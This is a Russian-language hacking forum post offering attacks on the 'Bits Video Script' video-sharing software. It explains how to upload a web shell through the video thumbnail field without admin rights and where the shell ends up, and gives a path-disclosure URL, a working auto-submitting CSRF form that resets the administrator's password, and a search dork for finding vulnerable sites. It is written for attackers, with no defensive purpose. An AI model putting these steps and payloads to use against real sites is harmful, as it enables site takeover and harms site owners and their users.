29.04.2010, 20:49
|
|
Участник форума
Регистрация: 27.05.2009
Сообщений: 115
Провел на форуме:
2312554
Репутация:
97
|
|
Уязвимости Bits Video Script
Заливка шелла без прав админа :
Заходим на сайт, регистрируемся : сайт/register.php, входим со своим логином и паролем, заходим сюда : сайт/addvideo.php там где thumbs выбираем свой шелл и заливаем его.
После заливки он находится здесь : cайт/thumbs/имявашегошелла.php
Видео о том как залить шелл : http://www.youtube.com/watch?v=v6AOwLg1v3w
Раскрытие путей :
PHP код:
сайт/search.php?search[]=way&searchsubmit=
csrf уязвимость
PHP код:
<form method=post action="http://сайт/admin/password.php" onsubmit="return checkform(this);" name="csrf">
<input type='text' name='password' value="НОВЫЙ ПАРОЛЬ КОТОРЫЙ ВЫ ПОСТАВИТЕ АДМИНИСТРАТОРУ">
</form>
<script>
document.csrf.submit();
</script>
Поисковой запрос
PHP код:
inurl:search.php?order=views
(C) forum.kidal.org
Последний раз редактировалось seofilms; 29.04.2010 в 21:06..
|
|
|